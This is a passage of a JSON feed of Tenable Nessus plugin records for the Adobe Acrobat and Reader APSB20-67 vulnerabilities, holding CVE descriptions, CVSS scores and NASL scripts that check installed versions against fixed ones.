vulnerability\n that could result in local privilege escalation. Exploitation of this issue requires user interaction in\n that a victim must open a malicious file. (CVE-2020-24428)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) for macOS are affected by a signature verification bypass that could result in local\n privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a\n malicious file. (CVE-2020-24429)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a use-after-free vulnerability when handling malicious JavaScript. This\n vulnerability could result in arbitrary code execution in the context of the current user. Exploitation\n requires user interaction in that a victim must open a malicious file. (CVE-2020-24430)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) for macOS are affected by a security feature bypass that could result in dynamic library\n code injection by the Adobe Reader process. Exploitation of this issue requires user interaction in that a\n victim must open a malicious file. (CVE-2020-24431)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) and Adobe Acrobat Pro DC 2017.011.30175 (and earlier) are affected by an improper input\n validation vulnerability that could result in arbitrary JavaScript execution in the context of the current\n user. To exploit this issue, an attacker must acquire and then modify a certified PDF document that is\n trusted by the victim. The attacker then needs to convince the victim to open the document.\n (CVE-2020-24432)\n\n - Adobe Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and\n 2017.011.30175 (and earlier) are affected by a local privilege escalation vulnerability that could enable\n a user without administrator privileges to delete arbitrary files and potentially execute arbitrary code\n as SYSTEM. Exploitation of this issue requires an attacker to socially engineer a victim, or the attacker\n must already have some access to the environment. (CVE-2020-24433)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a heap-based buffer overflow vulnerability in the submitForm function,\n potentially resulting in arbitrary code execution in the context of the current user. Exploitation\n requires user interaction in that a victim must open a crafted .pdf file in Acrobat Reader.\n (CVE-2020-24435)\n\n - Acrobat Pro DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and\n earlier) are affected by an out-of-bounds write vulnerability that could result in writing past the end of\n an allocated memory structure. An attacker could leverage this vulnerability to execute code in the\n context of the current user. This vulnerability requires user interaction to exploit in that the victim\n must open a malicious document. (CVE-2020-24436)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions\n that could result in arbitrary code execution in the context of the current user. Exploitation of this\n issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24437)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a use-after-free vulnerability that could result in a memory address leak.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24438)\n\n - Acrobat Reader DC for macOS versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and\n 2017.011.30175 (and earlier) are affected by a security feature bypass. While the practical security\n impact is minimal, a defense-in-depth fix has been implemented to further harden the Adobe Reader update\n process. (CVE-2020-24439)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb20-67.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 2017.011.30175 / 2020.001.30005 / 2020.012.20048 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-24433\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Adobe Reader', win_local:TRUE);\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '20.012.20048', 'fixed_version' : '20.013.20064' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30005', 'fixed_version' : '20.001.30010' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30175', 'fixed_version' : '17.011.30180' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-02T00:03:22", "description": "The version of Adobe Acrobat installed on the remote Windows host is a version prior or equal to 2017.011.30175, 2020.001.30005, or 2020.012.20048. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24426, CVE-2020-24434)\n\n - Acrobat Reader versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an input validation vulnerability when decoding a crafted codec that could result in the disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24427)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a time-of-check time-of-use (TOCTOU) race condition vulnerability that could result in local privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24428)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a signature verification bypass that could result in local privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24429)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability when handling malicious JavaScript. This vulnerability could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a malicious file. (CVE-2020-24430)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a security feature bypass that could result in dynamic library code injection by the Adobe Reader process. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24431)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) and Adobe Acrobat Pro DC 2017.011.30175 (and earlier) are affected by an improper input validation vulnerability that could result in arbitrary JavaScript execution in the context of the current user. To exploit this issue, an attacker must acquire and then modify a certified PDF document that is trusted by the victim. The attacker then needs to convince the victim to open the document.\n (CVE-2020-24432)\n\n - Adobe Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a local privilege escalation vulnerability that could enable a user without administrator privileges to delete arbitrary files and potentially execute arbitrary code as SYSTEM. Exploitation of this issue requires an attacker to socially engineer a victim, or the attacker must already have some access to the environment. (CVE-2020-24433)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a heap-based buffer overflow vulnerability in the submitForm function, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .pdf file in Acrobat Reader.\n (CVE-2020-24435)\n\n - Acrobat Pro DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds write vulnerability that could result in writing past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. This vulnerability requires user interaction to exploit in that the victim must open a malicious document. (CVE-2020-24436)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24437)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability that could result in a memory address leak.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24438)\n\n - Acrobat Reader DC for macOS versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a security feature bypass. While the practical security impact is minimal, a defense-in-depth fix has been implemented to further harden the Adobe Reader update process. (CVE-2020-24439)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-11-05T00:00:00", "type": "nessus", "title": "Adobe Acrobat <= 2017.011.30175 / 2020.001.30005 / 2020.012.20048 Multiple Vulnerabilities (APSB20-67)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-24426", "CVE-2020-24427", "CVE-2020-24428", "CVE-2020-24429", "CVE-2020-24430", "CVE-2020-24431", "CVE-2020-24432", "CVE-2020-24433", "CVE-2020-24434", "CVE-2020-24435", "CVE-2020-24436", "CVE-2020-24437", "CVE-2020-24438", "CVE-2020-24439"], "modified": "2021-02-25T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB20-67.NASL", "href": "https://www.tenable.com/plugins/nessus/142466", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142466);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/25\");\n\n script_cve_id(\n \"CVE-2020-24426\",\n \"CVE-2020-24427\",\n \"CVE-2020-24428\",\n \"CVE-2020-24429\",\n \"CVE-2020-24430\",\n \"CVE-2020-24431\",\n \"CVE-2020-24432\",\n \"CVE-2020-24433\",\n \"CVE-2020-24434\",\n \"CVE-2020-24435\",\n \"CVE-2020-24436\",\n \"CVE-2020-24437\",\n \"CVE-2020-24438\",\n \"CVE-2020-24439\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0506-S\");\n\n script_name(english:\"Adobe Acrobat <= 2017.011.30175 / 2020.001.30005 / 2020.012.20048 Multiple Vulnerabilities (APSB20-67)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is a version prior or equal to 2017.011.30175,\n2020.001.30005, or 2020.012.20048. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of\n sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24426, CVE-2020-24434)\n\n - Acrobat Reader versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and\n earlier) are affected by an input validation vulnerability when decoding a crafted codec that could result\n in the disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations\n such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious\n file. (CVE-2020-24427)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) for macOS are affected by a time-of-check time-of-use (TOCTOU) race condition vulnerability\n that could result in local privilege escalation. Exploitation of this issue requires user interaction in\n that a victim must open a malicious file. (CVE-2020-24428)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) for macOS are affected by a signature verification bypass that could result in local\n privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a\n malicious file. (CVE-2020-24429)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a use-after-free vulnerability when handling malicious JavaScript. This\n vulnerability could result in arbitrary code execution in the context of the current user. Exploitation\n requires user interaction in that a victim must open a malicious file. (CVE-2020-24430)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) for macOS are affected by a security feature bypass that could result in dynamic library\n code injection by the Adobe Reader process. Exploitation of this issue requires user interaction in that a\n victim must open a malicious file. (CVE-2020-24431)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) and Adobe Acrobat Pro DC 2017.011.30175 (and earlier) are affected by an improper input\n validation vulnerability that could result in arbitrary JavaScript execution in the context of the current\n user. To exploit this issue, an attacker must acquire and then modify a certified PDF document that is\n trusted by the victim. The attacker then needs to convince the victim to open the document.\n (CVE-2020-24432)\n\n - Adobe Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and\n 2017.011.30175 (and earlier) are affected by a local privilege escalation vulnerability that could enable\n a user without administrator privileges to delete arbitrary files and potentially execute arbitrary code\n as SYSTEM. Exploitation of this issue requires an attacker to socially engineer a victim, or the attacker\n must already have some access to the environment. (CVE-2020-24433)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a heap-based buffer overflow vulnerability in the submitForm function,\n potentially resulting in arbitrary code execution in the context of the current user. Exploitation\n requires user interaction in that a victim must open a crafted .pdf file in Acrobat Reader.\n (CVE-2020-24435)\n\n - Acrobat Pro DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and\n earlier) are affected by an out-of-bounds write vulnerability that could result in writing past the end of\n an allocated memory structure. An attacker could leverage this vulnerability to execute code in the\n context of the current user. This vulnerability requires user interaction to exploit in that the victim\n must open a malicious document. (CVE-2020-24436)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions\n that could result in arbitrary code execution in the context of the current user. Exploitation of this\n issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24437)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a use-after-free vulnerability that could result in a memory address leak.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24438)\n\n - Acrobat Reader DC for macOS versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and\n 2017.011.30175 (and earlier) are affected by a security feature bypass. While the practical security\n impact is minimal, a defense-in-depth fix has been implemented to further harden the Adobe Reader update\n process. (CVE-2020-24439)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb20-67.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat version 2017.011.30175 / 2020.001.30005 / 2020.012.20048 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-24433\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Adobe Acrobat', win_local:TRUE);\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '20.012.20048', 'fixed_version' : '20.013.20064' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30005', 'fixed_version' : '20.001.30010' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30175', 'fixed_version' : '17.011.30180' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-02T00:03:20", "description": "The version of Adobe Acrobat installed on the remote macOS host is a version prior or equal to 2017.011.30175, 2020.001.30005, or 2020.012.20048. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24426, CVE-2020-24434)\n\n - Acrobat Reader versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an input validation vulnerability when decoding a crafted codec that could result in the disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24427)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a time-of-check time-of-use (TOCTOU) race condition vulnerability that could result in local privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24428)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a signature verification bypass that could result in local privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24429)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability when handling malicious JavaScript. This vulnerability could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a malicious file. (CVE-2020-24430)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a security feature bypass that could result in dynamic library code injection by the Adobe Reader process. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24431)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) and Adobe Acrobat Pro DC 2017.011.30175 (and earlier) are affected by an improper input validation vulnerability that could result in arbitrary JavaScript execution in the context of the current user. To exploit this issue, an attacker must acquire and then modify a certified PDF document that is trusted by the victim. The attacker then needs to convince the victim to open the document.\n (CVE-2020-24432)\n\n - Adobe Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a local privilege escalation vulnerability that could enable a user without administrator privileges to delete arbitrary files and potentially execute arbitrary code as SYSTEM. Exploitation of this issue requires an attacker to socially engineer a victim, or the attacker must already have some access to the environment. (CVE-2020-24433)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a heap-based buffer overflow vulnerability in the submitForm function, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .pdf file in Acrobat Reader.\n (CVE-2020-24435)\n\n - Acrobat Pro DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds write vulnerability that could result in writing past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. This vulnerability requires user interaction to exploit in that the victim must open a malicious document. (CVE-2020-24436)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24437)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability that could result in a memory address leak.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24438)\n\n - Acrobat Reader DC for macOS versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a security feature bypass. While the practical security impact is minimal, a defense-in-depth fix has been implemented to further harden the Adobe Reader update process. (CVE-2020-24439)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-11-05T00:00:00", "type": "nessus", "title": "Adobe Acrobat <= 2017.011.30175 / 2020.001.30005 / 2020.012.20048 Multiple Vulnerabilities (APSB20-67) (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-24426", "CVE-2020-24427", "CVE-2020-24428", "CVE-2020-24429", "CVE-2020-24430", "CVE-2020-24431", "CVE-2020-24432", "CVE-2020-24433", "CVE-2020-24434", "CVE-2020-24435", "CVE-2020-24436", "CVE-2020-24437", "CVE-2020-24438", "CVE-2020-24439"], "modified": "2021-02-25T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "MACOS_ADOBE_ACROBAT_APSB20-67.NASL", "href": "https://www.tenable.com/plugins/nessus/142468", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142468);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/25\");\n\n script_cve_id(\n \"CVE-2020-24426\",\n \"CVE-2020-24427\",\n \"CVE-2020-24428\",\n \"CVE-2020-24429\",\n \"CVE-2020-24430\",\n \"CVE-2020-24431\",\n \"CVE-2020-24432\",\n \"CVE-2020-24433\",\n \"CVE-2020-24434\",\n \"CVE-2020-24435\",\n \"CVE-2020-24436\",\n \"CVE-2020-24437\",\n \"CVE-2020-24438\",\n \"CVE-2020-24439\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0506-S\");\n\n script_name(english:\"Adobe Acrobat <= 2017.011.30175 / 2020.001.30005 / 2020.012.20048 Multiple Vulnerabilities (APSB20-67) (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote macOS host is a version prior or equal to 2017.011.30175,\n2020.001.30005, or 2020.012.20048. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of\n sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24426, CVE-2020-24434)\n\n - Acrobat Reader versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and\n earlier) are affected by an input validation vulnerability when decoding a crafted codec that could result\n in the disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations\n such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious\n file. (CVE-2020-24427)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) for macOS are affected by a time-of-check time-of-use (TOCTOU) race condition vulnerability\n that could result in local privilege escalation. Exploitation of this issue requires user interaction in\n that a victim must open a malicious file. (CVE-2020-24428)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) for macOS are affected by a signature verification bypass that could result in local\n privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a\n malicious file. (CVE-2020-24429)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a use-after-free vulnerability when handling malicious JavaScript. This\n vulnerability could result in arbitrary code execution in the context of the current user. Exploitation\n requires user interaction in that a victim must open a malicious file. (CVE-2020-24430)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) for macOS are affected by a security feature bypass that could result in dynamic library\n code injection by the Adobe Reader process. Exploitation of this issue requires user interaction in that a\n victim must open a malicious file. (CVE-2020-24431)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) and Adobe Acrobat Pro DC 2017.011.30175 (and earlier) are affected by an improper input\n validation vulnerability that could result in arbitrary JavaScript execution in the context of the current\n user. To exploit this issue, an attacker must acquire and then modify a certified PDF document that is\n trusted by the victim. The attacker then needs to convince the victim to open the document.\n (CVE-2020-24432)\n\n - Adobe Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and\n 2017.011.30175 (and earlier) are affected by a local privilege escalation vulnerability that could enable\n a user without administrator privileges to delete arbitrary files and potentially execute arbitrary code\n as SYSTEM. Exploitation of this issue requires an attacker to socially engineer a victim, or the attacker\n must already have some access to the environment. (CVE-2020-24433)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a heap-based buffer overflow vulnerability in the submitForm function,\n potentially resulting in arbitrary code execution in the context of the current user. Exploitation\n requires user interaction in that a victim must open a crafted .pdf file in Acrobat Reader.\n (CVE-2020-24435)\n\n - Acrobat Pro DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and\n earlier) are affected by an out-of-bounds write vulnerability that could result in writing past the end of\n an allocated memory structure. An attacker could leverage this vulnerability to execute code in the\n context of the current user. This vulnerability requires user interaction to exploit in that the victim\n must open a malicious document. (CVE-2020-24436)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions\n that could result in arbitrary code execution in the context of the current user. Exploitation of this\n issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24437)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a use-after-free vulnerability that could result in a memory address leak.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24438)\n\n - Acrobat Reader DC for macOS versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and\n 2017.011.30175 (and earlier) are affected by a security feature bypass. While the practical security\n impact is minimal, a defense-in-depth fix has been implemented to further harden the Adobe Reader update\n process. (CVE-2020-24439)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported 